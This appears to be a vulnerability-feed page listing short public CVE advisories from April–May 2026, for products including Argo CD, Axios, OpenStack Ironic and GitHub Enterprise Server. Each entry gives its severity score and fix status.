Insertion of Sensitive Information Into Sent Data vulnerability in Saad Iqbal WP EasyPay wp-easy-pay allows Retrieve Embedded Sensitive Data.This issue affects WP EasyPay: from n/a through <= 4.3.0.
Published 2026-05-12
- CriticalCVSS 9.6 v3·EPSS 0.5%·Fix available
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. From versions 3.2.0 to before 3.2.11 and 3.3.0 to before 3.3.9, there is a missing authorization and data-masking gap in Argo CD's ServerSideDiff endpoint that allows an attacker with read-only access to extract plaintext Kubernetes Secret data from etcd via the Kubernetes API server's Server-Side Apply dry-run mechanism. This issue has been patched in versions 3.2.11 and 3.3.9.
Published 2026-05-07
- MediumCVSS 4.6 v3·EPSS 0.1%·No fix yet
HCL BigFix Service Management (SM) does not adequately sanitize or safely render spreadsheet files (CSV, XLS, XLSX) before processing or distributing them. An attacker could populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software. Note that current versions of Excel warn users of untrusted content.
Published 2026-05-06
- HighCVSS 7.7 v3·EPSS 0.4%·Fix available
An issue was discovered in idrac in OpenStack Ironic before 35.0.1. During import, a user invoking molds can request authorization to be sent to a remote endpoint. The credential forwarded is a time-limited Keystone token (which provides access to all OpenStack services Ironic is authorized for); or basic credentials configured for molds storage. The fixed versions are 26.1.6, 29.0.5, 32.0.1, and 35.0.1.
Published 2026-05-05
- HighCVSS 7.7 v3·EPSS 0.2%·No fix yet
Insertion of Sensitive Information Into Sent Data vulnerability in WPDeveloper Templately allows Retrieve Embedded Sensitive Data.This issue affects Templately: from n/a through 3.6.1.
Published 2026-04-27
- MediumCVSS 5.4 v3·EPSS 0.2%·Fix available
Axios is a promise based HTTP client for the browser and Node.js. Prior to 1.15.1 and 0.31.1, the Axios library's XSRF token protection logic uses JavaScript truthy/falsy semantics instead of strict boolean comparison for the withXSRFToken config property. When this property is set to any truthy non-boolean value (via prototype pollution or misconfiguration), the same-origin check (isURLSameOrigin) is short-circuited, causing XSRF tokens to be sent to all request targets including cross-origin servers controlled by an attacker. This vulnerability is fixed in 1.15.1 and 0.31.1.
Published 2026-04-24
- MediumCVSS 4.3 v3·EPSS 0.3%·Fix available
An improper authorization vulnerability was identified in GitHub Enterprise Server that allowed an authenticated attacker to determine the names of private repositories by their numeric ID. The mobile upload policy API endpoint did not perform an early authorization check, and validation error messages included the full repository name for repositories the caller did not have access to. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21 and was fixed in versions 3.20.1, 3.19.5, 3.18.8, 3.17.14, 3.16.17, 3.15.21, and 3.14.26. This vulnerability was reported via the GitHub Bug Bounty program.
Published 2026-04-21
Uses NVD data but is not endorsed or certified by the NVD. EPSS scores courtesy of FIRST.org (https://www.first.org/epss). Source: CISA KEV Catalog.